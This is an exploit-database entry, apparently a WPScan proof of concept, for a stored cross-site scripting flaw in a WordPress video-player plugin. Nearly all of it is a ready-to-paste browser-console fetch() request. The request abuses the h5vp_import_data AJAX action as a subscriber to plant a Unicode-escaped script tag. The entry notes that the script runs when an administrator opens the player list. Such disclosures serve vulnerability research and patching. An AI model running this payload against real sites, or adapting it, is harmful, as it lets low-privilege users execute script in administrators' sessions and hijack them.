## https://sploitus.com/exploit?id=WPEX-ID:759B3866-C619-42CC-94A8-0AF6D199CC81
Run the below command in the developer console of the web browser while being on the blog as a subscriber user (id=14 being the ID of an existing video player from the plugin)
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type":"application/x-www-form-urlencoded; charset=UTF-8",
},
"body": "action=h5vp_import_data&id=14&content={\"h5vp_total_views\":\"\\u003c\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0031\\u0029\\u003b\\u003c\\u002f\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e\"}",
"method": "POST",
}).then((response) => {return response.text(); }).then((data) => {console.log(data);})
The XSS will be triggered when an admin will view the player lists (ie https://example.com/wp-admin/edit.php?post_type=videoplayer)